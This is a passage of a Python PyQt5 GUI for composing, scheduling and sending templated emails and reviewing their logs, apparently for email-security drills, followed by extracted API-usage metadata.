self.left_layout.addWidget(self.btn_sendmail, 2, 0, 1, 3)\n self.left_layout.addWidget(self.btn_smtp, 3, 0, 1, 3)\n self.left_layout.addWidget(self.btn_db, 4, 0, 1, 3)\n self.left_layout.addWidget(self.btn_update_eml, 5, 0, 1, 3)\n self.left_layout.addWidget(self.btn_get_logs, 6, 0, 1, 3)\n self.left_layout.addWidget(self.btn_download_logs, 7, 0, 1, 3)\n self.left_layout.addWidget(self.quit_btn, 8, 0, 1, 3)\n\n # 主要功能查詢\n self.in_data = QLineEdit()\n self.in_data.setPlaceholderText(\"暫無\")\n self.left_layout.addWidget(self.in_data, 1, 0, 1, 3)\n\n # 主要功能 log\n self.query_result = QTableWidget()\n self.left_layout.addWidget(self.query_result, 9, 0, 2, 3)\n self.query_result.verticalHeader().setVisible(False)\n\n self.right_display = GraphicsLayoutWidget()\n self.right_layout.addWidget(self.right_display, 0, 3, 12, 8)\n\n # 右側物件: sendmail\n self.in_eml_type = QLineEdit()\n self.in_eml_template = QLineEdit()\n self.btn_eml_browse = QPushButton('瀏覽')\n self.btn_eml_browse.clicked.connect(lambda: self.open_eml(self.in_eml_template))\n self.in_recipient_group = QLineEdit()\n self.in_recipient_excel = QLineEdit()\n self.btn_recipient_browse = QPushButton('瀏覽')\n self.btn_recipient_browse.clicked.connect(lambda: self.open_excel(self.in_recipient_excel))\n self.in_annex_file = QLineEdit()\n self.btn_annex_file = QPushButton('瀏覽')\n self.btn_annex_file.clicked.connect(lambda: self.open_word(self.in_annex_file))\n self.in_scheduler = QDateTimeEdit(QDateTime.currentDateTime())\n self.in_scheduler.setCalendarPopup(True)\n self.in_scheduler.setDisplayFormat('yyyy-MM-dd hh:mm')\n self.cb_scheduler = QCheckBox('使用')\n self.btn_sendmail_start = QPushButton('執行')\n self.btn_sendmail_start.clicked.connect(self.send_mail)\n\n # 右側物件: smtp\n self.in_smtp_host = QLineEdit()\n self.in_smtp_port = QLineEdit()\n self.in_smtp_user = QLineEdit()\n self.in_smtp_password = QLineEdit()\n self.cb_smtp_ssl = QCheckBox('使用')\n self.in_smtp_test = QLineEdit()\n self.btn_smtp_save = QPushButton('儲存')\n self.btn_smtp_save.clicked.connect(lambda: self.save_data(self.data_smtp))\n self.btn_smtp_test = QPushButton('測試')\n self.btn_smtp_test.clicked.connect(self.show_sub_win)\n\n # 右側物件: db\n self.in_db_host = QLineEdit()\n self.in_db_port = QLineEdit()\n self.in_db_user = QLineEdit()\n self.in_db_password = QLineEdit()\n self.in_db_database = QLineEdit()\n self.in_db_domain = QLineEdit()\n self.in_db_domain.setPlaceholderText('回收風險資訊動作的網址')\n self.btn_db_save = QPushButton('儲存')\n self.btn_db_save.clicked.connect(lambda: self.save_data(self.data_db))\n\n # 右側物件: update eml\n self.in_edit_sender = QLineEdit()\n self.in_edit_sender_name = QLineEdit()\n self.cb_edit_annex = QCheckBox('是')\n self.in_edit_annex = QLineEdit()\n self.btn_edit_annex = QPushButton('瀏覽')\n self.btn_edit_annex.clicked.connect(lambda: self.open_annex(self.in_edit_annex))\n self.in_edit_subject = QLineEdit()\n\n self.mail_tab = QTabWidget()\n self.mail_tab.setDocumentMode(True)\n self.mail_tab.currentChanged.connect(self.print_html)\n self.mail_tab_1 = QWidget()\n self.mail_tab_2 = QWidget()\n self.mail_tab.addTab(self.mail_tab_1, 'Html')\n self.mail_tab.addTab(self.mail_tab_2, 'Web')\n\n self.tab_1 = QGridLayout() \n self.tab_2 = QGridLayout()\n self.tab_1.setContentsMargins(0,0,0,0)\n self.tab_2.setContentsMargins(0,0,0,0)\n self.mail_tab_1.setLayout(self.tab_1) \n self.mail_tab_2.setLayout(self.tab_2)\n self.in_edit_html = QTextEdit()\n self.in_edit_web = QWebEngineView()\n self.tab_1.addWidget(self.in_edit_html, 1, 1, 1, 1)\n self.tab_2.addWidget(self.in_edit_web, 1, 1, 1, 1)\n\n self.btn_edit_eml_reset = QPushButton('清除')\n self.btn_edit_eml_reset.clicked.connect(self.eml_reset)\n self.btn_edit_eml_read = QPushButton('讀取')\n self.btn_edit_eml_read.clicked.connect(self.eml_open)\n self.btn_edit_eml_save = QPushButton('儲存')\n self.btn_edit_eml_save.clicked.connect(self.eml_save)\n\n # 右側物件: logs\n self.tbw_logs = QTableWidget()\n self.tbw_logs.verticalHeader().setVisible(False)\n self.cmb_logs_choice = QComboBox()\n self.in_logs_data = QLineEdit()\n self.in_logs_data.setPlaceholderText(\"輸入資料\")\n self.btn_logs_search = QPushButton('執行')\n self.btn_logs_search.clicked.connect(self.logs_change)\n\n\n def display_send_mail(self):\n self.clear_layout(self.right_layout)\n\n labels = [ \"信件類型 :\", \"信件模板 :\", \" 收件人群組 :\", \"收件人資料 :\", '附件資料 :',\"設定排程 :\"]\n for i, label in enumerate(labels):\n self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)\n\n self.right_layout.addWidget(self.in_eml_type, 0, 4, 1, 7)\n self.right_layout.addWidget(self.in_eml_template, 1, 4, 1, 6)\n self.right_layout.addWidget(self.btn_eml_browse, 1, 10, 1, 1)\n self.right_layout.addWidget(self.in_recipient_group, 2, 4, 1, 7)\n self.right_layout.addWidget(self.in_recipient_excel, 3, 4, 1, 6)\n self.right_layout.addWidget(self.btn_recipient_browse, 3, 10, 1, 1)\n self.right_layout.addWidget(self.in_annex_file , 4, 4, 1, 6)\n self.right_layout.addWidget(self.btn_annex_file, 4, 10, 1, 1)\n self.right_layout.addWidget(self.in_scheduler, 5, 4, 1, 6)\n self.right_layout.addWidget(self.cb_scheduler, 5, 10, 1, 1)\n self.right_layout.addWidget(self.btn_sendmail_start, 6, 9, 1, 2)\n\n def display_smtp_setting(self):\n self.clear_layout(self.right_layout)\n \n # 在右邊新增物件 \n labels = [\"SMTP HOST :\", \"SMTP PORT :\", \"SMTP 帳號 :\", \"SMTP 密碼 :\", \"SMTP SSL :\", \" 測試信件內容 :\"]\n for i, label in enumerate(labels):\n self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)\n\n self.right_layout.addWidget(self.in_smtp_host, 0, 4, 1, 7)\n self.right_layout.addWidget(self.in_smtp_port, 1, 4, 1, 7)\n self.right_layout.addWidget(self.in_smtp_user, 2, 4, 1, 7)\n self.right_layout.addWidget(self.in_smtp_password, 3, 4, 1, 7)\n self.right_layout.addWidget(self.cb_smtp_ssl, 4, 4, 1, 7)\n self.right_layout.addWidget(self.in_smtp_test, 5, 4, 1, 7)\n self.right_layout.addWidget(self.btn_smtp_save, 6, 9, 1, 2)\n self.right_layout.addWidget(self.btn_smtp_test, 6, 7, 1, 2)\n \n def display_db_setting(self):\n self.clear_layout(self.right_layout)\n \n # 在右邊新增物件 \n labels = [\"資料庫 HOST :\", \"資料庫 PORT :\", \"資料庫 帳號 :\", \"資料庫 密碼 :\", \"使用資料庫名稱 :\", \"回收網址 :\"]\n for i, label in enumerate(labels):\n self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)\n\n self.right_layout.addWidget(self.in_db_host, 0, 4, 1, 7)\n self.right_layout.addWidget(self.in_db_port, 1, 4, 1, 7)\n self.right_layout.addWidget(self.in_db_user, 2, 4, 1, 7)\n self.right_layout.addWidget(self.in_db_password, 3, 4, 1, 7)\n self.right_layout.addWidget(self.in_db_database, 4, 4, 1, 7)\n self.right_layout.addWidget(self.in_db_domain, 5, 4, 1, 7)\n self.right_layout.addWidget(self.btn_db_save, 6, 9, 1, 2) \n\n def display_update_eml(self):\n self.clear_layout(self.right_layout)\n\n labels = [\"寄件人 :\", \"寄件人名稱 :\", \" 是否加入附件 :\", \"附件名稱 :\", \"主旨 :\", \"內容 :\"]\n for i, label in enumerate(labels):\n self.label = QLabel(label)\n self.right_layout.addWidget(self.label, i, 3, 1, 1, Qt.AlignRight)\n \n self.right_layout.addWidget(self.in_edit_sender, 0, 4, 1, 7)\n self.right_layout.addWidget(self.in_edit_sender_name, 1, 4, 1, 7)\n self.right_layout.addWidget(self.cb_edit_annex, 2, 4, 1, 7)\n self.right_layout.addWidget(self.in_edit_annex, 3, 4, 1, 6)\n self.right_layout.addWidget(self.btn_edit_annex, 3, 10, 1, 1)\n self.right_layout.addWidget(self.in_edit_subject, 4, 4, 1, 7)\n self.right_layout.addWidget(self.mail_tab, 5, 4, 6, 7)\n self.right_layout.addWidget(self.btn_edit_eml_reset, 11, 5, 1, 2)\n self.right_layout.addWidget(self.btn_edit_eml_read, 11, 7, 1, 2)\n self.right_layout.addWidget(self.btn_edit_eml_save, 11, 9, 1, 2)\n\n def display_logs(self):\n self.data_temp_logs = []\n self.tbw_logs.setRowCount(0)\n self.clear_layout(self.right_layout)\n self.right_layout.addWidget(self.tbw_logs, 1, 3, 11, 8)\n self.right_layout.addWidget(QLabel('查詢 :'), 0, 3, 1, 1)\n self.right_layout.addWidget(self.cmb_logs_choice, 0, 4, 1, 2)\n self.right_layout.addWidget(self.in_logs_data, 0, 6, 1, 3)\n self.right_layout.addWidget(self.btn_logs_search, 0, 9, 1, 2)\n\n try:\n db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db[:5] else Database()\n self.data_logs = db.get_logs()\n self.data_temp_logs = deepcopy(self.data_logs)\n \n if self.data_logs:\n row_num = len(self.data_logs)\n col_num = len(self.data_logs[0])\n col_lst = list(self.data_logs[0].keys())\n self.cmb_logs_choice.clear()\n self.cmb_logs_choice.addItems(col_lst)\n\n self.tbw_logs.setRowCount(row_num) \n self.tbw_logs.setColumnCount(col_num)\n self.tbw_logs.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)\n self.tbw_logs.setHorizontalHeaderLabels(col_lst)\n\n for i in range(row_num):\n row_data = list(self.data_logs[i].values())\n for j in range(col_num):\n temp_data = row_data[j]\n item = QTableWidgetItem(str(temp_data))\n item.setForeground(QBrush(QColor(144, 182, 240)))\n self.tbw_logs.setItem(i, j, item)\n except:\n QMessageBox.warning(self, 'Failed!', '資料庫連結失敗!', QMessageBox.Ok)\n else:\n db.__disconnect__()\n\n def get_items_from_layout(self, layout):\n return [layout.itemAt(i).widget() for i in range(layout.count())]\n\n def save_data(self, data):\n items = self.get_items_from_layout(self.right_layout)\n data.clear()\n\n try:\n for item in items:\n if type(item) == type(QLineEdit()):\n data.append(item.text())\n elif type(item) == type(QCheckBox()):\n data.append(item.isChecked()) \n\n QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok) \n except:\n QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n\n print(data)\n\n def clear_layout(self, layout):\n for i in reversed(range(layout.count())): \n layout.itemAt(i).widget().setParent(None)\n\n def open_eml(self, obj):\n file_name, _ = QFileDialog.getOpenFileName(self, \"選取檔案\", \"./\", \"Eml Files (*.eml)\")\n obj.setText(file_name)\n\n def open_excel(self, obj):\n file_name, _ = QFileDialog.getOpenFileName(self, \"選取檔案\", \"./\", \"Excel Files (*.xlsx)\")\n obj.setText(file_name)\n\n def open_word(self, obj):\n file_name, _ = QFileDialog.getOpenFileName(self, \"選取檔案\", \"./\", \"Word Files (*.doc *.docx)\")\n obj.setText(file_name)\n\n def open_annex(self, obj):\n file_name, _ = QFileDialog.getOpenFileName(self, \"選取檔案\", \"./\", \"Annex Files (*.jpg *.png *.zip)\")\n org_files = obj.text()\n all_files = org_files + ',' + file_name if org_files else file_name\n obj.setText(all_files)\n\n def print_html(self, index):\n if index:\n self.in_edit_web.setHtml(self.in_edit_html.toPlainText())\n\n def send_mail(self):\n eml_type = self.in_eml_type.text()\n eml_file = self.in_eml_template.text()\n user_group = self.in_recipient_group.text()\n mail_excel = self.in_recipient_excel.text()\n annex_file = self.in_annex_file.text()\n url = self.data_db[5] if self.data_db else 'http://yumail.myvnc.com'\n\n try:\n if self.cb_scheduler.isChecked():\n my_time = self.in_scheduler.text()+':00'\n\n client = Client()\n client.send(self.data_smtp[:4], self.data_db[:5], eml_type, eml_file, user_group, mail_excel, annex_file, url, my_time)\n \n QMessageBox.information(self, 'Success!', '排程設定成功!', QMessageBox.Ok)\n else:\n sm = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3]) if self.data_smtp else Smtp()\n db = Database(self.data_db[0], int(self.data_db[1]), self.data_db[2], self.data_db[3], self.data_db[4]) if self.data_db else Database()\n\n insert_send_mail(eml_type, eml_file, user_group, mail_excel, sm, db, annex=annex_file, url=url)\n \n sm.close()\n db.__disconnect__()\n \n QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\n except:\n QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\n\n def show_sub_win(self):\n if self.data_smtp:\n self.sub_win = SubWindow()\n self.sub_win.btn_send.clicked.connect(self.send_test)\n self.sub_win.show()\n else:\n QMessageBox.warning(self, 'Failed!', '請確認有無 SMTP 資料!', QMessageBox.Ok)\n \n def send_test(self):\n try:\n if self.data_smtp:\n mailserver = Smtp(self.data_smtp[0], int(self.data_smtp[1]), self.data_smtp[2], self.data_smtp[3])\n mail_msg = gm.gen_test_eml(['Test Email', '測試寄件人', self.data_smtp[2], self.sub_win.in_recipient.text()], self.data_smtp[5])\n error = mailserver.send(mail_msg.as_string(), self.data_smtp[2], self.sub_win.in_recipient.text())\n mailserver.close()\n if error:\n QMessageBox.warning(self, 'Warning!', '信件寄出成功!\\nWaning: '+error, QMessageBox.Ok)\n else:\n QMessageBox.information(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\n self.sub_win.in_recipient.clear()\n except:\n QMessageBox.warning(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\n \n def eml_open(self):\n self.in_edit_html.clear()\n file_name, _ = QFileDialog.getOpenFileName(self, \"選取檔案\", \"./\", \"Eml Files (*.eml)\")\n if not file_name:\n return\n \n header, html = gm.get_msg(file_name) \n self.in_edit_sender.setText(header[2])\n self.in_edit_sender_name.setText(header[1])\n self.in_edit_subject.setText(header[0])\n self.in_edit_html.insertPlainText(html)\n\n def eml_save(self):\n header, msg = [], ''\n header.append(self.in_edit_subject.text())\n header.append(self.in_edit_sender_name.text())\n header.append(self.in_edit_sender.text())\n header.append('')\n annex_file = self.in_edit_annex.text().split(',')\n html = self.in_edit_html.toPlainText()\n\n if not any(header[:3]) or not html:\n return\n\n try: \n msg = gm.gen_eml(header, html, annex_file) if self.cb_edit_annex.isChecked() else gm.gen_eml(header, html)\n\n file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.eml)')\n with open(file_path, 'w') as outfile:\n gen = generator.Generator(outfile)\n gen.flatten(msg)\n \n QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n except:\n QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n\n def eml_reset(self):\n items = self.get_items_from_layout(self.right_layout)\n for item in items:\n if type(item) == type(QLineEdit()):\n item.clear()\n \n self.cb_edit_annex.setChecked(False)\n self.in_edit_html.clear()\n\n def logs_change(self):\n if not self.data_logs or not self.in_logs_data.text():\n return\n\n self.data_temp_logs = []\n self.tbw_logs.setRowCount(0)\n \n # header = {'郵件類型':'type', '郵件主旨':'subject', '使用者群組':'user_group', '使用者信箱':'user_email'}\n condition = self.cmb_logs_choice.currentText()\n content = self.in_logs_data.text()\n\n row_num = len(self.data_logs)\n col_num = len(self.data_logs[0])\n\n # self.tbw_logs.setRowCount(row_num) \n self.tbw_logs.setColumnCount(col_num)\n\n for i in range(row_num):\n switch = False\n if condition == 'date' and content in str(self.data_logs[i][condition]):\n switch = True\n elif self.data_logs[i][condition] == content:\n switch = True\n \n if switch:\n self.tbw_logs.insertRow(self.tbw_logs.rowCount())\n row_data = list(self.data_logs[i].values())\n self.data_temp_logs.append(self.data_logs[i])\n for j in range(col_num):\n temp_data = row_data[j]\n item = QTableWidgetItem(str(temp_data))\n item.setForeground(QBrush(QColor(144, 182, 240)))\n self.tbw_logs.setItem(self.tbw_logs.rowCount()-1, j, item)\n\n def logs_download(self):\n if self.data_temp_logs:\n try:\n file_path, _ = QFileDialog.getSaveFileName(self, '另存為...', './', 'Excel Files (*.xlsx)')\n if not file_path:\n return\n\n df = DataFrame(self.data_temp_logs)\n df.to_excel(file_path, index=False)\n\n QMessageBox.information(self, 'Success!', '儲存成功!', QMessageBox.Ok)\n except:\n QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\n else:\n QMessageBox.warning(self, \"缺少資料\", \"請確認是否有資料可以下載\", QMessageBox.Ok)\n\n def quit_act(self):\n # sender 是发送信号的对象\n sender = self.sender()\n print(sender.text() + '键被按下')\n qApp = QApplication.instance()\n qApp.quit()\n\ndef main():\n app = QApplication(sys.argv)\n gui = MailserverUi()\n gui.show()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n main()"},"apis":{"kind":"list like","value":["PyQt5.QtGui.QColor","PyQt5.QtWidgets.QApplication","copy.deepcopy","PyQt5.QtWidgets.QFileDialog.getOpenFileName","PyQt5.QtWidgets.QTableWidget","PyQt5.QtWidgets.QTextEdit","PyQt5.QtWidgets.QFileDialog.getSaveFileName","email.generator.Generator","PyQt5.QtWidgets.QComboBox","PyQt5.QtCore.QDateTime.currentDateTime","qdarkstyle.load_stylesheet_pyqt5","GenAndSendMail.insert_send_mail","PyQt5.QtWidgets.QLabel","pandas.DataFrame","PyQt5.QtWidgets.QPushButton","PyQt5.QtWidgets.QLineEdit","PyQt5.QtWidgets.QWidget","PyQt5.QtWidgets.QApplication.instance","mylibrary.genmail.get_msg","PyQt5.QtWebEngineWidgets.QWebEngineView","PyQt5.QtWidgets.QMessageBox.information","pyqtgraph.setConfigOptions","PyQt5.QtWidgets.QGridLayout","server.sendmail.Smtp","server.client.Client","PyQt5.QtWidgets.QTabWidget","PyQt5.QtWidgets.QCheckBox","mylibrary.genmail.gen_eml","pyqtgraph.GraphicsLayoutWidget","pyqtgraph.setConfigOption","server.database.Database","PyQt5.QtWidgets.QMessageBox.warning"],"string":"[\n \"PyQt5.QtGui.QColor\",\n \"PyQt5.QtWidgets.QApplication\",\n \"copy.deepcopy\",\n \"PyQt5.QtWidgets.QFileDialog.getOpenFileName\",\n \"PyQt5.QtWidgets.QTableWidget\",\n \"PyQt5.QtWidgets.QTextEdit\",\n \"PyQt5.QtWidgets.QFileDialog.getSaveFileName\",\n \"email.generator.Generator\",\n \"PyQt5.QtWidgets.QComboBox\",\n \"PyQt5.QtCore.QDateTime.currentDateTime\",\n \"qdarkstyle.load_stylesheet_pyqt5\",\n \"GenAndSendMail.insert_send_mail\",\n \"PyQt5.QtWidgets.QLabel\",\n \"pandas.DataFrame\",\n \"PyQt5.QtWidgets.QPushButton\",\n \"PyQt5.QtWidgets.QLineEdit\",\n \"PyQt5.QtWidgets.QWidget\",\n \"PyQt5.QtWidgets.QApplication.instance\",\n \"mylibrary.genmail.get_msg\",\n \"PyQt5.QtWebEngineWidgets.QWebEngineView\",\n \"PyQt5.QtWidgets.QMessageBox.information\",\n \"pyqtgraph.setConfigOptions\",\n \"PyQt5.QtWidgets.QGridLayout\",\n \"server.sendmail.Smtp\",\n \"server.client.Client\",\n \"PyQt5.QtWidgets.QTabWidget\",\n \"PyQt5.QtWidgets.QCheckBox\",\n \"mylibrary.genmail.gen_eml\",\n \"pyqtgraph.GraphicsLayoutWidget\",\n \"pyqtgraph.setConfigOption\",\n \"server.database.Database\",\n \"PyQt5.QtWidgets.QMessageBox.warning\"\n]"},"extract_api":{"kind":"string","value":"[((22731, 22753), 'PyQt5.QtWidgets.QApplication', 'QApplication', (['sys.argv'], {}), '(sys.argv)\\n', (22743, 22753), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((986, 999), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\\n', (997, 999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((1196, 1207), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (1205, 1207), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((1298, 1315), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"寄送\"\"\"'], {}), \"('寄送')\\n\", (1309, 1315), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((1472, 1512), 'pyqtgraph.setConfigOption', 'setConfigOption', (['\"\"\"background\"\"\"', '\"\"\"#19232D\"\"\"'], {}), \"('background', '#19232D')\\n\", (1487, 1512), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\\n'), ((1521, 1555), 'pyqtgraph.setConfigOption', 'setConfigOption', (['\"\"\"foreground\"\"\"', '\"\"\"d\"\"\"'], {}), \"('foreground', 'd')\\n\", (1536, 1555), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\\n'), ((1564, 1596), 'pyqtgraph.setConfigOptions', 'setConfigOptions', ([], {'antialias': '(True)'}), '(antialias=True)\\n', (1580, 1596), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\\n'), ((2553, 2562), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\\n', (2560, 2562), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((2613, 2626), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\\n', (2624, 2626), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((2754, 2763), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\\n', (2761, 2763), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((2847, 2860), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\\n', (2858, 2860), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((2961, 2970), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\\n', (2968, 2970), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((3056, 3069), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\\n', (3067, 3069), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((3432, 3451), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"發送信件\"\"\"'], {}), \"('發送信件')\\n\", (3443, 3451), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((3542, 3561), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"系統設定\"\"\"'], {}), \"('系統設定')\\n\", (3553, 3561), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((3649, 3669), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"資料庫設定\"\"\"'], {}), \"('資料庫設定')\\n\", (3660, 3669), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((3761, 3780), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"修改樣板\"\"\"'], {}), \"('修改樣板')\\n\", (3772, 3780), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((3878, 3901), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"\\x08觸發明細\"\"\"'], {}), \"('\\\\x08觸發明細')\\n\", (3889, 3901), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((3993, 4014), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"下載觸發明細\"\"\"'], {}), \"('下載觸發明細')\\n\", (4004, 4014), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((4106, 4123), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"退出\"\"\"'], {}), \"('退出')\\n\", (4117, 4123), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((4674, 4685), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (4683, 4685), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((4841, 4855), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ([], {}), '()\\n', (4853, 4855), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((5013, 5035), 'pyqtgraph.GraphicsLayoutWidget', 'GraphicsLayoutWidget', ([], {}), '()\\n', (5033, 5035), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\\n'), ((5158, 5169), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (5167, 5169), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((5201, 5212), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (5210, 5212), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((5243, 5260), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['\"\"\"瀏覽\"\"\"'], {}), \"('瀏覽')\\n\", (5254, 5260), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((5384, 5395), 